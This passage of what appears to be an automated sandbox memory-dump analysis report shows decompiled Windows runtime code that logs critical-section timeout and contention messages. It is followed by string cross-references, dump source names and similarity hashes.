                                                    				E03305720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                    				_t9 =  *_t15;
                                                    				if(_t9 == 0xffffffff) {
                                                    					_t10 = 0;
                                                    				} else {
                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                    				}
                                                    				_push(_t10);
                                                    				_push(_t15);
                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                    				return E03305720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                    			}


                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0330FDFA
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0330FE01
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0330FE2B
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: e028c1b69d9ba5ab3c5c249bd32d35828195c9ff2d535edb65a1477a77b44a97
                                                    • Instruction ID: f417f5cc530f7f2280fceff338c241ad346b8dbb45f4f32a189de0c925c00a7b
                                                    • Opcode Fuzzy Hash: e028c1b69d9ba5ab3c5c249bd32d35828195c9ff2d535edb65a1477a77b44a97
                                                    • Instruction Fuzzy Hash: 54F0F636604301BFE6209A45DC46F23BB6AEB45B30F140314F6285A5E1DA62F8A0D6F0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%